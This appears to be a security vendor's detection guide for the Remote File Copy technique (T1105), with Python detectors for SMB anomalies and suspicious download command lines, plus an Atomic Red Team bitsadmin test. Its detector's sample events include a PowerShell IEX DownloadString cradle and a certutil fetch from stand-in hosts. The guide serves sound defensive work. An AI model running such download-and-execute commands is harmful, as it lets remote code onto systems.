Remote File Copy
Remote File Copy is fundamentally similar to Windows Admin Shares, and so the popularity of the ETERNALBLUE exploit among adversaries probably plays a substantial role in its prominence.
Editors’ note: While the analysis and detection opportunities remain applicable, MITRE has deprecated this technique and this page has not been updated since 2020.
Why do adversaries use Remote File Copy?
Living-off-the-land techniques are popular because many of the tools that an adversary might need to conduct a successful attack are installed on machines by default. However, not all exploitation tools exist natively on all systems. Adversaries leverage the Remote File Copy technique to deploy binaries from a command and control (C2) server to a victim machine or between systems in a compromised environment. As these examples suggest, the technique falls under both the Command and Control and Lateral Movement tactics.
Like certain other techniques on this list, Remote File Copy is a technique of necessity. Adversaries often have to copy files between remote systems if they want to accomplish their objectives. As a result, we see many prominent malware families leveraging Remote File Copy. MITRE ATT&CK lists nearly 200 threat groups and malware samples, but some prominent examples include:
How do adversaries use Remote File Copy?
While there are many broad and specific adversarial use cases for it, much of the Remote File Copy activity we observe relates to server message block (SMB) scanning and Lateral Movement.
Some other behaviors that are commonly associated with Remote File Copy include:
- Downloading binaries over HTTP/HTTPS
- Downloading binaries using built-in operating system tools such as PowerShell, certutil.exe, wget/curl, and BITS/bitsadmin, among others
Threats may rely on download cradles that are not new but are less prevalent—such as a Python urllib download—to perform Remote File Copy.
Remote File Copy occurs in tandem with many other techniques, most frequently with Windows Admin Shares (T1077). BITS Jobs (T1197) is another technique that is conceptually similar and frequently occurs in tandem with Remote File Copy. Exfiltration Over Alternative Protocol (T1048) and Data Staged (T1074) are additional techniques that frequently show up with Remote File Copy, suggesting that the technique occasionally plays a role in exfiltration.
We also observe a high volume of detections where Remote File Copy occurs with Process Injection (T1055) and a smaller volume occurring with Disabling Security Tools (T1089), both likely due to TrickBot. Some other interesting associations include DLL Search Order Hijacking (T1038), Domain Trust Discovery (T1482), and Process Hollowing (T1093).
MITRE’s data sources
- File monitoring
- Packet capture
- Process use of network
- Netflow/Enclave netflow
- Network protocol analysis
- Process monitoring
In addition to those data sources listed by MITRE ATT&CK, security teams should consider collecting from the following log sources:
- Firewall logs
- Database logs
- Email logs
Netflow/Enclave netflow and network protocol analysis
Network protocol analysis and/or Netflow will have the best chance to detect remote file transfers because, by definition, a Remote File Copy will have to traverse the network.
Process monitoring serves as an excellent supplement to network-based monitoring. Since it’s host based, this data source isn’t as easily affected by the evasion techniques that adversaries often use to subvert network-based security technologies, such as encryption or the misuse of network protocols.
You’ll want to establish a baseline for expected network activity and then alert on unusual network usage based on the following:
- Destination-source objects
- Data volume
- Other network traffic characteristics
This has been particularly effective in detecting data exfiltration. As an example, Red Canary has detected more than 1,000 confirmed threats this year based on detection and analysis of an excessive number of SMB sessions.
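The baseline-then-deviate approach described above, as an added example that is not Red Canary's own detection logic: flow records (source, destination, port, bytes) are constructed inline for a fictional network, a known-good window is used to derive per-host thresholds for SMB session count, distinct destinations and data volume, and a later window is checked against them. The z-score multiplier and the floor values are assumptions chosen for illustration; in practice the records would come from a firewall, netflow collector or network sensor.

```python
"""Baseline-then-deviate check for SMB activity per source host.

Added example, not Red Canary's own detection logic. Flow records are
constructed inline; thresholds (z-score, floors) are illustrative assumptions.
"""
from collections import defaultdict
from statistics import mean, pstdev

SMB_PORT = 445

# Constructed "known-good" window: (src, dst, dst_port, bytes_out).
BASELINE_FLOWS = [
    ("ws01", "fs01", 445, 40_000), ("ws01", "fs01", 445, 35_000), ("ws01", "fs02", 445, 30_000),
    ("ws02", "fs01", 445, 45_000), ("ws02", "fs02", 445, 20_000),
    ("ws03", "fs01", 445, 50_000), ("ws03", "fs01", 445, 25_000),
    ("ws03", "fs01", 445, 30_000), ("ws03", "fs02", 445, 20_000),
    ("ws04", "fs01", 445, 30_000), ("ws04", "fs01", 445, 30_000), ("ws04", "fs02", 445, 25_000),
    ("ws01", "web01", 443, 200_000),  # non-SMB traffic is ignored by this check
]

# Constructed observation window: ws03 fans out to a dozen peers on 445
# (SMB scanning / lateral movement pattern) and ws04 pushes far more data
# to fs01 than any host did in the baseline (possible staging/exfil).
CURRENT_FLOWS = [
    ("ws01", "fs01", 445, 42_000), ("ws01", "fs02", 445, 28_000),
    ("ws02", "fs01", 445, 44_000), ("ws02", "fs02", 445, 22_000),
    *[("ws03", f"ws{n:02d}", 445, 5_000) for n in range(5, 17)],
    ("ws04", "fs01", 445, 900_000), ("ws04", "fs02", 445, 25_000),
]

# Metrics derived per source host from the aggregated SMB flows.
METRICS = {
    "sessions": lambda s: s["sessions"],
    "dests": lambda s: len(s["dests"]),
    "bytes": lambda s: s["bytes"],
}

# Floors stop a near-uniform baseline (stddev close to 0) from alerting on
# trivial changes. Values are assumptions for this example.
FLOORS = {"sessions": 10, "dests": 5, "bytes": 200_000}


def smb_stats(flows):
    """Aggregate SMB flows per source host: session count, distinct destinations, bytes."""
    stats = defaultdict(lambda: {"sessions": 0, "dests": set(), "bytes": 0})
    for src, dst, port, nbytes in flows:
        if port != SMB_PORT:
            continue
        stats[src]["sessions"] += 1
        stats[src]["dests"].add(dst)
        stats[src]["bytes"] += nbytes
    return stats


def build_thresholds(baseline_flows, z=3.0):
    """Per metric: max(mean + z * stddev across baseline hosts, floor)."""
    stats = smb_stats(baseline_flows)
    thresholds = {}
    for name, fn in METRICS.items():
        values = [fn(s) for s in stats.values()]
        thresholds[name] = max(mean(values) + z * pstdev(values), FLOORS[name])
    return thresholds


def find_outliers(flows, thresholds):
    """Return {host: {metric: observed}} for every metric above its threshold."""
    alerts = {}
    for host, s in smb_stats(flows).items():
        hits = {name: fn(s) for name, fn in METRICS.items() if fn(s) > thresholds[name]}
        if hits:
            alerts[host] = hits
    return alerts


if __name__ == "__main__":
    thr = build_thresholds(BASELINE_FLOWS)
    print("thresholds:", thr)
    for host, hits in find_outliers(CURRENT_FLOWS, thr).items():
        print(f"{host}: {hits}")
```

The baseline window yields thresholds of 10 sessions, 5 distinct destinations and 200,000 bytes (each metric's floor wins here because four well-behaved hosts give a very narrow distribution); against the observation window, ws03 trips the session and destination metrics and ws04 trips the volume metric. The distinct-destination metric is the one that most directly captures SMB scanning, since a host legitimately talking to two file servers rarely needs to open sessions to twelve peers.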
In terms of process data, there are a number of operating system-level commands that are capable of—but unusual mechanisms for—file transfer. Some examples include the use of:
- Python web server and curl
- OpenSSL for encrypted file transfers
Examining telemetry for these unusual events can be an effective way to detect malicious Remote File Copies. That said, most adversaries will only resort to using these unusual mechanisms for file transfer if more typical ones—such as File Transfer Protocol (FTP) and Secure Copy (SCP), for example—are not available.
In addition, any non-native applications that establish network connections should be viewed with suspicion. The nearly 200 threats that MITRE ATT&CK lists for this technique include numerous examples that may be detectable in this way.
Weeding out false positives
False positive rates for detecting malicious Remote File Copying will vary widely from one environment to the next. For example, a public FTP server might generate an excessive number of alerts for suspicious FTP connections, so analytics based on any data source will need to be tuned for the environment in which they’re deployed. In some environments, connections to network printers may skew the expected network connections for system processes such as Notepad.
The two data sources suggested above (network and process data) probably have the greatest capacity to generate false positives if you fail to tune them. In general, process data is easier to tune, since it tends to include more context (e.g., user context, frequency analysis, and process ancestry) that can be used to determine behavior and intent.
Start testing your defenses against Remote File Copy using Atomic Red Team—an open source testing framework of small, highly portable detection tests mapped to MITRE ATT&CK.
View Atomic tests for T1105: Remote File Copy. In most environments, these should be sufficient to generate a useful signal for defenders.
Run this test on a Windows system using Command Prompt:
C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt
Useful telemetry will include:
- Process command line: “/transfer qcxjb7”, and the presence of a URL
- File creation: “Atomic-license.txt”
- Network connection to remote site: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
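The process-command-line side of the detection, as an added example that is not Red Canary's or Atomic Red Team's code: it covers the built-in download tools and less common transfer mechanisms named above (bitsadmin, certutil, PowerShell cradles, curl/wget, a Python web server, OpenSSL) and pulls the command-line and URL telemetry out of a bitsadmin line like the Atomic test. The process events are constructed (the bitsadmin line mirrors the test command; the other hostnames use the reserved `.invalid` domain), and the regex rule set, the `svc_deploy`/`deploytool.exe` tuning allowlist and the use of parent image and user as tuning context are all assumptions for this example.

```python
"""Flag command lines that use built-in or unusual file-transfer mechanisms.

Added example, not Red Canary's or Atomic Red Team's code. Events, rules and
the tuning allowlist are constructed/assumed for illustration.
"""
import re
from collections import Counter

# Each rule: (name, regex over the full command line). Patterns are assumptions.
RULES = [
    ("bits_transfer", re.compile(r"\bbitsadmin(\.exe)?\b.*\s/transfer\b", re.I)),
    ("certutil_fetch", re.compile(r"\bcertutil(\.exe)?\b.*\s-urlcache\b", re.I)),
    ("powershell_cradle", re.compile(
        r"\bpowershell(\.exe)?\b.*(Invoke-WebRequest|DownloadString|DownloadFile|\biwr\b|\bwget\b)", re.I)),
    ("curl_wget", re.compile(r"^(?:\S*[\\/])?(curl|wget)(\.exe)?\s", re.I)),
    ("python_http_server", re.compile(
        r"\bpython\d?(\.exe)?\b.*-m\s+(http\.server|SimpleHTTPServer)\b", re.I)),
    ("openssl_transfer", re.compile(r"\bopenssl(\.exe)?\s+s_(server|client)\b", re.I)),
]
# URL extraction stops at whitespace, quotes and closing parentheses.
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)

# Tuning allowlist: (user, parent image) pairs known to run these tools
# legitimately, e.g. a software-deployment service. Assumed values.
ALLOWLIST = {("svc_deploy", "deploytool.exe")}

# Constructed process-creation events (user, parent image, command line).
EVENTS = [
    {"user": "alice", "parent": "explorer.exe", "cmdline": r"C:\Windows\notepad.exe report.txt"},
    {"user": "alice", "parent": "cmd.exe",
     "cmdline": r"C:\Windows\System32\bitsadmin.exe /transfer qcxjb7 /Priority HIGH "
                r"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt Atomic-license.txt"},
    {"user": "bob", "parent": "cmd.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://files.example.invalid/update.bin C:\Users\bob\update.bin"},
    {"user": "bob", "parent": "powershell.exe",
     "cmdline": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://files.example.invalid/a.ps1')\""},
    {"user": "carol", "parent": "bash", "cmdline": "python3 -m http.server 8080"},
    {"user": "carol", "parent": "bash", "cmdline": "openssl s_client -quiet -connect 10.0.0.5:8443"},
    {"user": "svc_deploy", "parent": "deploytool.exe",
     "cmdline": "curl.exe -o installer.msi https://updates.example.invalid/installer.msi"},
]


def classify(cmdline):
    """Return the names of every rule that matches the command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def extract_urls(cmdline):
    """Pull URLs out of a command line (the 'presence of a URL' signal)."""
    return URL_RE.findall(cmdline)


def bits_transfer_target(cmdline):
    """For a bitsadmin /transfer line, return (remote_url, local_path) from the trailing argument pair."""
    parts = cmdline.split()
    if len(parts) >= 2 and URL_RE.fullmatch(parts[-2]):
        return parts[-2], parts[-1]
    return None


def evaluate(events, allowlist=ALLOWLIST):
    """Findings for events matching a rule, minus allowlisted (user, parent) context."""
    findings = []
    for ev in events:
        rules = classify(ev["cmdline"])
        if not rules or (ev["user"], ev["parent"]) in allowlist:
            continue
        findings.append({"user": ev["user"], "parent": ev["parent"],
                         "rules": rules, "urls": extract_urls(ev["cmdline"])})
    return findings


def rule_frequency(findings):
    """How often each rule fires: a first input for per-environment tuning."""
    return Counter(r for f in findings for r in f["rules"])


if __name__ == "__main__":
    for f in evaluate(EVENTS):
        print(f["user"], f["parent"], f["rules"], f["urls"])
    print(rule_frequency(evaluate(EVENTS)))
```

Run against the constructed events, five findings come back (bitsadmin, certutil, the PowerShell cradle, the Python web server and the OpenSSL client); the `curl.exe` download is suppressed only because its user and parent image are on the allowlist, which is the kind of context-based tuning that process data makes possible and raw network flow does not. `bits_transfer_target` returns the remote URL and the local file name (`Atomic-license.txt`) for the test command, which is exactly the pair a file-creation event and a network-connection event would let you corroborate.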
Review and repeat
Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:
- Were any of your actions detected?
- Were any of your actions blocked or prevented?
- Were your actions visible in logs or other defensive telemetry?
Repeat this process, performing additional tests related to this technique. You can also create and contribute tests of your own.